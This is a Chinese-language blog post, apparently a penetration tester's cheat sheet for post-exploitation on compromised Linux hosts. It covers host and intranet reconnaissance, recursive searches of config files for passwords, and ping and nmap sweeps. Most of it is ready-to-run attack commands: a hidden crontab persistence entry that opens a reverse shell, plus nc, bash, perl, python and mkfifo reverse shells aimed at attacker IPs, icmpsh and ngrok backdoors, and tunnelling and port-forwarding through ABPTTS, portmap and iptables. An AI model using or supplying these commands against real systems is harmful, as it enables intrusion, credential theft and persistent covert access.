Linux主机信息收集

2021年12月22日

last   多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像
Ifconfig -a/arp -a/netstat -anopt/ss -nt
ifconfig -a 查看内网ip 网卡 网关   
route -n   内网路由情况,也能为内网网络拓扑提供一定的信息
IPtables    防火墙情况,有时候会存在内网网络通行规则,也能提供一定信息
history    查看历史执行命令
last/lastlog/lastb 查看登陆记录
netstat -anopt 查看网络链接
iptables --list 查看防火墙规则

敏感文件收集

grep "password:" * -Rn
find / -name "config.*"
find / -name "databases.*"
find / -name "config.*" | xargs grep "password""

查看存活IP

for i in $( seq 1 255);do ping -c 1 192.168.0.$i | grep "ttl" | awk -F "[ :]+" '{print $4}'; done > ip.txt
for i in $( seq 1 255);do ping -c 1 192.168.$i.1 | grep "ttl" | awk -F "[ :]+" '{print $4}'; done > ip.txt
#!/bin/bash
for ip in 192.168.1.{1..254} 
do 
	ping $ip -c 1 &> /dev/null 
		if [ $? -eq 0 ];then 
			echo $ip is alive .... 
		fi 
done

或者
for i in 192.168.4.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done

namp的icmp扫描
nmap -sn -PE 192.168.1.0/24
nmap arp 扫描
nmap -sn -PR 192.168.1.0/24
基于smb netbios 内网主机发现
wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgz
tar -zxvf nbtscan-source-1.0.35.tgz
make
echo $?
./nbtscan -h
./nbtscan -m 192.168.1.0/24

反弹shell 

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/12.12.12.12/4433;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

高级版 无状态链接

(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/12.12.12.12/4433;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for whoami%100c\n")|crontab -

详细描述

https://github.com/tom0li/security_circle/blob/master/15288418585142.md

Grok-backdoor

python后门 使用ngrok通信  

https://github.com/deepzec/Grok-backdoor

icmpsh

vps
git clone https://github.com/inquisb/icmpsh.git
apt-get install python-impacket
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python icmpsh_m.py 12.12.12.12 127.1.1.207
靶机
icmpsh.exe -t 12.12.12.12 -d 500 -b 30 -s 128
这样就会在vps上链接到一个cmdshell

NC反弹

正向反弹shell
服务器端
nc -lvvp 7777 -e /bin/bash
本地
nc 192.168.242.129 7777
即可获得服务器端的shell
反向链接
服务端
nc -e /bin/bash 192.168.242.1 7777
本地
nc -lvvp 7777
不使用-e参数反弹
使用管道
服务端
mknod /tmp/backpipe p     #需要root权限执行
/bin/sh 0</tmp/backpipe | nc 192.168.242.1 7777 1>/tmp/backpipe

mkfifo /tmp/backpipe p     #没有root权限情况下可以使用该命令
/bin/sh 0</tmp/backpipe | nc 192.168.xx.xx 4430 1>/tmp/backpipe
攻击端
nc -lnvp 7777
mknod需要root用户,但是也可以通过mkfifo /tmp/backpipe也可以创建一个管道。

Bash反弹

服务端:
bash -c 'sh -i &>/dev/tcp/210.28.30.887/53 0>&1'
或者
bash -i >& /dev/tcp/192.168.242.1/7777 0>&1
攻击端:
nc -lvvp 7777

Perl反弹

服务端:
perl -e 'use Socket;$i="192.168.242.1";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.242.1:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'while<>;'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.27.32.227",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

rm

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 12.12.12.12 1234 >/tmp/f

Http代理

https://github.com/nccgroup/ABPTTS

pip install pycrypto    加密库,整个数据加密都要靠这个
pip install httplib2
python abpttsfactory.py -o web
python abpttsclient.py -c webshell\config.txt -u "http://12.12.12.12/abptts.aspx" -f 127.0.0.1:1234/127.0.0.1:3389

linux portmap

监听1234端口,转发数据到2333端口
本地:./portmap -m 2 -p1 1234 -p2 2333
将目标的3389转发到本地的1234端口
./portmap -m 1 -p1 3389 -h2 ip -p2 1234
iptables
1、编辑配置文件/etc/sysctl.conf的net.ipv4.ip_forward = 1
2、关闭服务
service iptables stop
3、配置规则
需要访问的内网地址:192.168.206.101
内网边界web服务器:192.168.206.129
iptables -t nat -A PREROUTING --dst 192.168.206.129 -p tcp --dport 3389 -j DNAT --to-destination 192.168.206.101:3389
iptables -t nat -A POSTROUTING --dst 192.168.206.101 -p tcp --dport 3389 -j SNAT --to-source 192.168.206.129
4、保存&&重启服务
service iptables save && service iptables start


分类:技术文章 | 标签: 渗透linux内网提权 | 查看:101
Crackmapexec端口转发python脚本

发表评论: